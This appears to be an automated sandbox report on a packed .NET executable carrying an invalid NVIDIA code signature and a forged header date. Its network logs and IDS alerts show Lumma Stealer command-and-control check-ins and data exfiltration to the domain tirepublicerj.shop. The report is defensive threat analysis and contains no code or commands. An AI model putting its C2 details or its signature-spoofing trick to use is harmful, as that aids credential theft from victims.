Entrypoint:	0x40dade
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xda90	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5d000	0x2628	.BSS
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xda41	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbae4	0xbc00	19f0b50531f98a20a9a65d39c849687c	False	0.5685048204787234	data	6.109180699584785	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x598	0x600	0952258526daaa3e0a687f3a06f53a5d	False	0.4114583333333333	data	4.03365806651715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	8213ad787590c8df00be095c16f90f29	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x12000	0x50800	0x50800	2222f87b85ae0a7a267bc50cd850219a	False	1.0003366411102483	data	7.999369568013561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0xe3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-04T22:58:07.459055+0100	2058628	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)	1	192.168.2.4	50365	1.1.1.1	53	UDP
2025-01-04T22:58:08.034243+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:08.034243+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:08.548914+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:08.548914+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:09.019156+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:09.019156+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:09.491546+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:09.491546+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:10.221347+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-04T22:58:10.221347+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-04T22:58:11.328741+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-04T22:58:11.328741+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-04T22:58:11.823080+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-04T22:58:12.715275+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-04T22:58:12.715275+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-04T22:58:13.997441+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-04T22:58:13.997441+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-04T22:58:15.331970+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-04T22:58:15.331970+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-04T22:58:15.336589+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-04T22:58:17.342354+0100	2058629	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)	1	192.168.2.4	49746	104.21.64.1	443	TCP
2025-01-04T22:58:17.342354+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.64.1	443	TCP
2025-01-04T22:58:17.803148+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 22:58:07.477515936 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:07.477565050 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:07.477632999 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:07.480812073 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:07.480829000 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.034168959 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.034243107 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.039426088 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.039438963 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.039817095 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.093066931 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.129007101 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.129065990 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.129118919 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.548911095 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.549027920 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.549179077 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.550983906 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.551017046 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.551039934 CET	49733	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.551047087 CET	443	49733	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.558742046 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.558780909 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:08.558873892 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.559150934 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:08.559166908 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.019071102 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.019155979 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.025194883 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.025224924 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.025451899 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.028140068 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.028189898 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.028213978 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491539001 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491607904 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491655111 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491714001 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491718054 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.491748095 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491763115 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.491786957 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491827965 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.491830111 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491842985 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.491878033 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.492322922 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.498073101 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.498120070 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.498142958 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.498163939 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.499347925 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579449892 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579541922 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579575062 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579612017 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579629898 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579678059 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579724073 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579773903 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579894066 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579909086 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.579924107 CET	49735	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.579930067 CET	443	49735	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.715475082 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.715533972 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:09.715601921 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.716062069 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:09.716080904 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.221235991 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.221347094 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.222412109 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.222423077 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.222664118 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.229598999 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.229731083 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.229764938 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.229890108 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.229898930 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.848170996 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.848289013 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.848495960 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.848576069 CET	49737	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.848596096 CET	443	49737	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.865011930 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.865048885 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:10.865201950 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.865513086 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:10.865526915 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.328669071 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.328741074 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.330002069 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.330007076 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.330234051 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.338871002 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.338983059 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.339001894 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.823075056 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.823189974 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:11.823266029 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.844310045 CET	49740	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:11.844329119 CET	443	49740	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.220915079 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.220966101 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.221041918 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.242572069 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.242589951 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.715194941 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.715275049 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.717034101 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.717041016 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.717282057 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.725873947 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.726010084 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.726047993 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:12.726119041 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:12.726130009 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.328754902 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.328852892 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.328931093 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.329130888 CET	49742	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.329144001 CET	443	49742	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.530878067 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.530926943 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.531084061 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.534310102 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.534326077 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.997315884 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.997441053 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.998975039 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:13.998985052 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:13.999214888 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.008567095 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.008651018 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.008656979 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.495029926 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.495150089 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.495246887 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.495518923 CET	49744	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.495537043 CET	443	49744	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.847070932 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.847110033 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:14.847208023 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.847548962 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:14.847562075 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.331903934 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.331969976 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.333563089 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.333581924 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.333823919 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.335072994 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.335871935 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.335905075 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.335990906 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336028099 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.336119890 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336185932 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.336308956 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336334944 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.336461067 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336483002 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.336658955 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336695910 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.336704969 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336802006 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.336838961 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.345963001 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.346142054 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.346169949 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.346195936 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.346214056 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.346267939 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.346288919 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.350990057 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:15.351104021 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:15.351133108 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:16.857780933 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:16.857892036 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:16.857959986 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:16.858196020 CET	49745	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:16.858216047 CET	443	49745	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:16.863373995 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:16.863423109 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:16.863517046 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:16.863807917 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:16.863820076 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.342168093 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.342354059 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.344381094 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.344393015 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.344635963 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.345947027 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.345968962 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.346021891 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.803164005 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.803267002 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.803340912 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.803514957 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.803540945 CET	443	49746	104.21.64.1	192.168.2.4
Jan 4, 2025 22:58:17.803558111 CET	49746	443	192.168.2.4	104.21.64.1
Jan 4, 2025 22:58:17.803565979 CET	443	49746	104.21.64.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 22:58:07.459054947 CET	50365	53	192.168.2.4	1.1.1.1
Jan 4, 2025 22:58:07.472575903 CET	53	50365	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2025 22:58:07.459054947 CET	192.168.2.4	1.1.1.1	0xa231	Standard query (0)	tirepublicerj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
